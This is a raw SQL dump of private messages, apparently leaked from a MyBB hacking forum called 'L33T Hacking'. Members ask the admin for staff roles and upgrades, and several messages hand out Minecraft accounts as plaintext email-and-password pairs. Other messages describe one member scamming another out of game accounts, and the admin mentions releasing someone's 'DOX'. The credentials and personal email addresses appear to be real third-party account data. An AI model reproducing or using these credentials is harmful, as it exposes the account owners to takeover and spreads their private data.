or Staff at your forum :)\r\n\r\nIm Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852\r\n\r\nI have had experience being moderator before at a hacking forum called Eliteguys\r\n\r\nHere is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L\r\n\r\nAs you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there\r\n\r\nhere is my profile on L33T HACKING : http://l33thacking.net/user-258.html\r\n\r\nLooking forward to hearing from you \r\n[/quote]\r\n\r\nhttp://l33thacking.net/misc.php?action=help&hid=17\r\n\r\n', '1350195991', '0', '3', '1350543928', '1', '0', '0', '1350196059'); INSERT INTO mybb_privatemessages VALUES('3361', '258', '1', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\nOk mate i registered , if possible i would like to be Moderator or Staff at your forum :)\r\n\r\nIm Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852\r\n\r\nI have had experience being moderator before at a hacking forum called Eliteguys\r\n\r\nHere is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L\r\n\r\nAs you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there\r\n\r\nhere is my profile on L33T HACKING : http://l33thacking.net/user-258.html\r\n\r\nLooking forward to hearing from you \r\n[/quote]\r\n\r\nhttp://l33thacking.net/misc.php?action=help&hid=17\r\n\r\n\r\n[/quote]\r\n\r\nOk i understand , How about a free upgrade then?\r\n\r\nYou said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum\r\n\r\nI am willing to move ALL MY HQ THREADS from ubers to your forum and remain more active here..\r\n\r\nThe reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t\r\n\r\nUbers is all about money now , i id rather be a part of this community instead of ubers\r\n\r\nHow about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :)', '1350543928', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3140', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: HELP please', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\nSORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING \r\nON UBER FORUMS I KNOW HOW TO \r\n[/quote]\r\n\r\nSame way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account.\r\n[/quote]\r\nare you sure you upgraded me because i still cant +rep people\r\n[/quote]\r\nwould you mind upgrading now please ;)\r\n\r\nI forgot to upgrade because I got busy with some other stuff. \r\n[/quote]\r\n[/quote]\r\n\r\nI did it after I replied to the PM.\r\n[/quote]\r\nthanks very nuch', '1350198783', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3141', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: HELP please', '0', '[quote=\'XxTREYZxX\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'treyz123456789\']\r\nSORRY FOR THE NOOBNESS BUT HOW DO YOU +REP PEOPLE ON L33THACKING \r\nON UBER FORUMS I KNOW HOW TO \r\n[/quote]\r\n\r\nSame way. You go to their profile and click on rate. You can\'t rep because you aren\'t upgraded but you can rep now because I upgraded your account.\r\n[/quote]\r\nare you sure you upgraded me because i still cant +rep people\r\n[/quote]\r\nwould you mind upgrading now please ;)\r\n\r\nI forgot to upgrade because I got busy with some other stuff. \r\n[/quote]\r\n[/quote]\r\n\r\nI did it after I replied to the PM.\r\n[/quote]\r\nthanks very nuch\r\n[/quote]\r\n\r\nNP, enjoy.', '1350198899', '0', '1', '0', '1', '0', '0', '1350199057'); INSERT INTO mybb_privatemessages VALUES('3407', '82', '82', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'codingcomputing', '0', 'Sup\r\n\r\nI joined this new forum, you will figure out why I joined when you see it. I\'m a mod on his site and helping him out because he is not that experienced with MyBB etc. He\'s site is new and he needs someone really active like you.\r\n\r\nI was wondering if you want to help him out with his activity?', '1350610727', '0', '3', '1350616702', '1', '0', '0', '1350616651'); INSERT INTO mybb_privatemessages VALUES('3143', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ipod', '0', '[quote=\'t3h jok3r\']\r\nCan you trust him?\r\n\r\nI released his DOX and all of a sudden why would he come back to a site where he has been kicked out of? I mean he was away for 3 days and now he all of a sudden left AF and came back to LH, a place which he hated the most? He even unblocked me on Skype but I removed him. Why would he unblock his enemy? I can\'t trust him. \r\n[/quote]\r\n\r\nhes a nice guy, and he probably forgive you.', '1350214288', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3146', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Email', '0', 'i have updated my e-mail', '1350221335', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3406', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: MINECRAFT PREMIUM ', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\nwould you like a minecraft premium i been giving alot away lately \r\nand i forgot to give you one. :O \r\n[/quote]\r\n\r\nNope but thanks for the offer. You can start one giveaway if you want in the gamers private forum.', '1350609152', '0', '3', '1350611067', '1', '0', '0', '1350610847'); INSERT INTO mybb_privatemessages VALUES('3148', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ipod', '0', 'could you please add ipod to moderator of unique, I want him as co-leader, thanks.', '1350230423', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3149', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Ipod', '0', '[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nCan you trust him?\r\n\r\nI released his DOX and all of a sudden why would he come back to a site where he has been kicked out of? I mean he was away for 3 days and now he all of a sudden left AF and came back to LH, a place which he hated the most? He even unblocked me on Skype but I removed him. Why would he unblock his enemy? I can\'t trust him. \r\n[/quote]\r\n\r\nhes a nice guy, and he probably forgive you.\r\n[/quote]\r\n\r\nI spoke to him on Skype and she and didn\'t forgive me and I\'ll add him as a Moderator. ', '1350233423', '0', '3', '1350234102', '1', '0', '0', '1350234002'); INSERT INTO mybb_privatemessages VALUES('3151', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Ipod', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nCan you trust him?\r\n\r\nI released his DOX and all of a sudden why would he come back to a site where he has been kicked out of? I mean he was away for 3 days and now he all of a sudden left AF and came back to LH, a place which he hated the most? He even unblocked me on Skype but I removed him. Why would he unblock his enemy? I can\'t trust him. \r\n[/quote]\r\n\r\nhes a nice guy, and he probably forgive you.\r\n[/quote]\r\n\r\nI spoke to him on Skype and she and didn\'t forgive me and I\'ll add him as a Moderator. \r\n[/quote]\r\n\r\nthanks alot, and I think hes a good guy but thats on him if he forgives you or not', '1350234102', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3523', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'here you go', '0', 'Hey remember when you wanted a account for Minecraft and it didn\'t work,well i feel bad because you didn\'t get one here you go \r\nUsername: eliotbehr@gmail.com\r\nPassword:pencil\r\nThis one WORKS and don\'t tell me it doesn\'t enjoy my friend ', '1350782980', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3155', '82', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'that minecraft account ', '0', 'hey iTzIpod whats doing i\'m here for that minecraft account\r\nthanks:)', '1350259882', '0', '3', '1350261349', '1', '0', '2', '1350260414'); INSERT INTO mybb_privatemessages VALUES('3156', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'that minecraft account ', '0', 'hey iTzIpod whats doing i\'m here for that minecraft account\r\nthanks:)', '1350259882', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3157', '257', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: that minecraft account ', '0', '[quote=\'XxTREYZxX\']\r\nhey iTzIpod whats doing i\'m here for that minecraft account\r\nthanks:)\r\n[/quote]\r\nwildwill4811@ymail.com:yomama\r\n\r\nUsername/Email:Password', '1350261349', '0', '3', '1350262050', '1', '0', '2', '1350262009'); INSERT INTO mybb_privatemessages VALUES('3227', '82', '254', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '2', 'You\'re Funny', '0', 'I see you were on the AQW account earlier today.\r\nI hope you are enjoying the AQW Account + the MC Account.\r\nBecause you sir.\r\nScammed me...\r\n\r\nYou simply went on your email. And then clicked saying that you did not make this request. And changed the password and the email. Using your Master Account. \r\n\r\nI can tell you logged on the account because \r\n1. I was never equipping those items.\r\n2. My password is incorrect. You changed it obviously.\r\n3. My email was changed also. I can\'t recover the account using my email.\r\n4. You didn\'t go on Skype talking to me explaining what happened or anything.\r\n5. You scammed me. :)\r\n\r\nEnjoy the accounts. ', '1350356818', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3159', '82', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: that minecraft account ', '0', '[quote=\'iTzIpod\']\r\n[quote=\'XxTREYZxX\']\r\nhey iTzIpod whats doing i\'m here for that minecraft account\r\nthanks:)\r\n[/quote]\r\nwildwill4811@ymail.com:yomama\r\n\r\nUsername/Email:Password\r\n[/quote]\r\nwhats the pass word', '1350262050', '0', '3', '1350262888', '1', '0', '2', '1350262871'); INSERT INTO mybb_privatemessages VALUES('3160', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: that minecraft account ', '0', '[quote=\'iTzIpod\']\r\n[quote=\'XxTREYZxX\']\r\nhey iTzIpod whats doing i\'m here for that minecraft account\r\nthanks:)\r\n[/quote]\r\nwildwill4811@ymail.com:yomama\r\n\r\nUsername/Email:Password\r\n[/quote]\r\nwhats the pass word', '1350262050', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3403', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'MINECRAFT PREMIUM ', '0', 'would you like a minecraft premium i been giving alot away lately \r\nand i forgot to give you one. :O ', '1350608952', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3405', '258', '258', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'Re: Forum', '0', '[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\nOk mate i registered , if possible i would like to be Moderator or Staff at your forum :)\r\n\r\nIm Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852\r\n\r\nI have had experience being moderator before at a hacking forum called Eliteguys\r\n\r\nHere is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L\r\n\r\nAs you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there\r\n\r\nhere is my profile on L33T HACKING : http://l33thacking.net/user-258.html\r\n\r\nLooking forward to hearing from you \r\n[/quote]\r\n\r\nhttp://l33thacking.net/misc.php?action=help&hid=17\r\n\r\n\r\n[/quote]\r\n\r\nOk i understand , How about a free upgrade then?\r\n\r\nYou said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum\r\n\r\nI am willing to move ALL MY HQ THREADS from ubers to your forum and remain more active here..\r\n\r\nThe reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t\r\n\r\nUbers is all about money now , i id rather be a part of this community instead of ubers\r\n\r\nHow about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :)\r\n[/quote]\r\n\r\n\r\nSure that would be great but before we upgrade someone we now require two HQ threads. ', '1350609110', '0', '3', '1350639163', '1', '0', '0', '1350629280'); INSERT INTO mybb_privatemessages VALUES('3162', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.\r\n[/quote]\r\nDamn wtf, I dont have money like that I only have $5\r\n[/quote]\r\n\r\nUse retailmenot.com for coupons.\r\n[/quote]\r\nShould I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608\r\n[/quote]\r\n\r\nLast used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work.\r\n[/quote]\r\nWhere is your domain registered at?', '1350262560', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3163', '257', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: that minecraft account ', '0', '[quote=\'XxTREYZxX\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'XxTREYZxX\']\r\nhey iTzIpod whats doing i\'m here for that minecraft account\r\nthanks:)\r\n[/quote]\r\nwildwill4811@ymail.com:yomama\r\n\r\nUsername/Email:Password\r\n[/quote]\r\nwhats the pass word\r\n[/quote]\r\n\r\nyomama', '1350262888', '0', '3', '1350263379', '1', '0', '2', '1350263357'); INSERT INTO mybb_privatemessages VALUES('3165', '82', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Re: that minecraft account ', '0', '[quote=\'iTzIpod\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'XxTREYZxX\']\r\nhey iTzIpod whats doing i\'m here for that minecraft account\r\nthanks:)\r\n[/quote]\r\nwildwill4811@ymail.com:yomama\r\n\r\nUsername/Email:Password\r\n[/quote]\r\nwhats the pass word\r\n[/quote]\r\n\r\nyomama\r\n[/quote]\r\nyeah thanks i just relized', '1350263379', '0', '3', '1350263468', '1', '0', '2', '1350263419'); INSERT INTO mybb_privatemessages VALUES('3166', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: that minecraft account ', '0', '[quote=\'iTzIpod\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'XxTREYZxX\']\r\nhey iTzIpod whats doing i\'m here for that minecraft account\r\nthanks:)\r\n[/quote]\r\nwildwill4811@ymail.com:yomama\r\n\r\nUsername/Email:Password\r\n[/quote]\r\nwhats the pass word\r\n[/quote]\r\n\r\nyomama\r\n[/quote]\r\nyeah thanks i just relized', '1350263379', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3167', '257', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: that minecraft account ', '0', '[quote=\'XxTREYZxX\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'XxTREYZxX\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'XxTREYZxX\']\r\nhey iTzIpod whats doing i\'m here for that minecraft account\r\nthanks:)\r\n[/quote]\r\nwildwill4811@ymail.com:yomama\r\n\r\nUsername/Email:Password\r\n[/quote]\r\nwhats the pass word\r\n[/quote]\r\n\r\nyomama\r\n[/quote]\r\nyeah thanks i just relized\r\n[/quote]\r\n\r\nNo prob.\r\nEnjoy! :D', '1350263468', '0', '1', '0', '1', '0', '2', '1350263703'); INSERT INTO mybb_privatemessages VALUES('3226', '254', '254', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"254\";}}', '1', 'You\'re Funny', '0', 'I see you were on the AQW account earlier today.\r\nI hope you are enjoying the AQW Account + the MC Account.\r\nBecause you sir.\r\nScammed me...\r\n\r\nYou simply went on your email. And then clicked saying that you did not make this request. And changed the password and the email. Using your Master Account. \r\n\r\nI can tell you logged on the account because \r\n1. I was never equipping those items.\r\n2. My password is incorrect. You changed it obviously.\r\n3. My email was changed also. I can\'t recover the account using my email.\r\n4. You didn\'t go on Skype talking to me explaining what happened or anything.\r\n5. You scammed me. :)\r\n\r\nEnjoy the accounts. ', '1350356818', '0', '3', '1350394035', '1', '0', '0', '1350393582'); INSERT INTO mybb_privatemessages VALUES('3169', '205', '205', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '1', 'Check out the gamers section', '0', 'hey man whats up come look at some of my post at the gaming section, the gaming sectin is kinda inactive ATM there about 5 of us that are active in the gamers section.thanks ', '1350268956', '0', '3', '1350297523', '1', '0', '2', '1350297431'); INSERT INTO mybb_privatemessages VALUES('3401', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'it does work ', '0', 'username:the.big.d.man@hotmail.com\r\npassword:chicken737\r\n\r\nlog into minecraft.net first \r\nscreenshot:[img]http://grab.by/gRWK[/img]\r\nsee it does work stop telling me it doesnt work when just logged into it?', '1350604402', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3225', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'To?', '0', 'Just wondering why reborn is mod when you said he was banned forever from it. And I think we should implement the rule no post and pm threads. :3', '1350356290', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3171', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Ipod', '0', '[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nCan you trust him?\r\n\r\nI released his DOX and all of a sudden why would he come back to a site where he has been kicked out of? I mean he was away for 3 days and now he all of a sudden left AF and came back to LH, a place which he hated the most? He even unblocked me on Skype but I removed him. Why would he unblock his enemy? I can\'t trust him. \r\n[/quote]\r\n\r\nhes a nice guy, and he probably forgive you.\r\n[/quote]\r\n\r\nI spoke to him on Skype and she and didn\'t forgive me and I\'ll add him as a Moderator. \r\n[/quote]\r\n\r\nthanks alot, and I think hes a good guy but thats on him if he forgives you or not\r\n[/quote]\r\n\r\nYeah and NP.', '1350272266', '0', '1', '0', '1', '0', '0', '1350319771'); INSERT INTO mybb_privatemessages VALUES('3173', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Domain Register', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.\r\n[/quote]\r\nDamn wtf, I dont have money like that I only have $5\r\n[/quote]\r\n\r\nUse retailmenot.com for coupons.\r\n[/quote]\r\nShould I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608\r\n[/quote]\r\n\r\nLast used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work.\r\n[/quote]\r\nWhere is your domain registered at?\r\n[/quote]\r\n\r\nNetfirms. ', '1350272529', '0', '3', '1350310349', '1', '0', '0', '1350310318'); INSERT INTO mybb_privatemessages VALUES('3175', '61', '61', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Monkey', '0', 'Thanks for keeping an eye out on Monkey and what site was he advertising? Link or name please. ', '1350274944', '0', '3', '1350315332', '1', '0', '0', '1350315268'); INSERT INTO mybb_privatemessages VALUES('3177', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hey HELP', '0', 'hey whats up, i would just like to say LH has been very inactive and was wondering if you want me to promote it.', '1350278627', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3400', '82', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'it does work ', '0', 'username:the.big.d.man@hotmail.com\r\npassword:chicken737\r\n\r\nlog into minecraft.net first \r\nscreenshot:[img]http://grab.by/gRWK[/img]\r\nsee it does work stop telling me it doesnt work when just logged into it?', '1350604402', '0', '1', '0', '1', '0', '2', '1350616705'); INSERT INTO mybb_privatemessages VALUES('3179', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey got a question....', '0', 'Is it ok if I advertise my monetizing forum on LH? It\'s basically a forum where people can go to check out all the awesome methods of making money and shit. And track their profits on the site and try to get to a large sum of money. It is in no way hacking or anything like that related.? Would that be alright? And I am also looking for staff so if you know anyone :P :P :P :P', '1350280623', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3180', '257', '257', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: Check out the gamers section', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\nhey man whats up come look at some of my post at the gaming section, the gaming sectin is kinda inactive ATM there about 5 of us that are active in the gamers section.thanks \r\n[/quote]\r\n\r\nHey mate,\r\n\r\nI shall check It out. I\'m not a Gamer, but will try to relate to what\'s there.\r\n\r\nCheers.', '1350297523', '0', '3', '1350347056', '1', '0', '2', '1350346969'); INSERT INTO mybb_privatemessages VALUES('3181', '205', '257', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: Check out the gamers section', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\nhey man whats up come look at some of my post at the gaming section, the gaming sectin is kinda inactive ATM there about 5 of us that are active in the gamers section.thanks \r\n[/quote]\r\n\r\nHey mate,\r\n\r\nI shall check It out. I\'m not a Gamer, but will try to relate to what\'s there.\r\n\r\nCheers.', '1350297523', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3398', '82', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: that premium account ', '0', '[quote=\'?(???)?TREYZ?(???)?\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'?(???)?TREYZ?(???)?\']\r\nhey here is that premium account please dont change the passwordddddd\r\nusername:the.big.d.man@hotmail.com\r\npassword:chicken737\r\nplease dont change it.\r\nplease say thanks on the thread\r\nrep me if i helped you \r\nand rate the thread if i helped you \r\ndont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :)\r\n\r\n[/quote]\r\n\r\n1. Can you fix your grammar?\r\n2. Account doesn\'t work.\r\n3. Even if it did, I can\'t change the password because I have to have the answers for the security questions.\r\n4. No asking for rep.\r\n5. Rating threads are disabled.\r\n\r\n[/quote]\r\n\r\nanwers to yours\r\n1.ok\r\n2.it does i just logged in and it worked fine\r\n3.just making sure\r\n4. i said rep if i helped you im not telling you to \r\n5. just realized that \r\nand the account does work try again\r\n[/quote]\r\n\r\nDo you know what fixing your grammar and spelling means? :/\r\n\r\n1. You still didn\'t do.\r\n2. No it does not work.\r\n3. Yeah I\'m correct.\r\n4. Still it\'s still considered asking for rep.\r\n5. Okay.', '1350599178', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3183', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me.\r\n[/quote]\r\n\r\nLooks like a scam anyway I only use a unverified canadian PP\r\n[/quote]\r\nOh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks\r\n[/quote]\r\n\r\nNetfirms: LOVE \r\n\r\nNamecheap: $4 domain registration for one year with free whoisguard protection.\r\n[/quote]\r\nThe domain I want says 10.69 a year on namecheap.\r\n[/quote]\r\n\r\nUhh I have no idea.\r\n[/quote]\r\nThat is weird\r\n[/quote]\r\n\r\nThey making fake promises lol.\r\n[/quote]\r\nLOL yea they sure are\r\n[/quote]\r\n\r\nI spoke to them and they said it\'s the STARTING PRICE.\r\n[/quote]\r\nDamn wtf, I dont have money like that I only have $5\r\n[/quote]\r\n\r\nUse retailmenot.com for coupons.\r\n[/quote]\r\nShould I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608\r\n[/quote]\r\n\r\nLast used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work.\r\n[/quote]\r\nWhere is your domain registered at?\r\n[/quote]\r\n\r\nNetfirms. \r\n[/quote]\r\nOkay I might register surpriseforums.com or .net ', '1350310349', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3185', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Monkey', '0', '[quote=\'t3h jok3r\']\r\nThanks for keeping an eye out on Monkey and what site was he advertising? Link or name please. \r\n[/quote]\r\nI deleted the post, So I can\'t remeber what it was. But it had ads for anarchy forums all over it', '1350315332', '0', '1', '0', 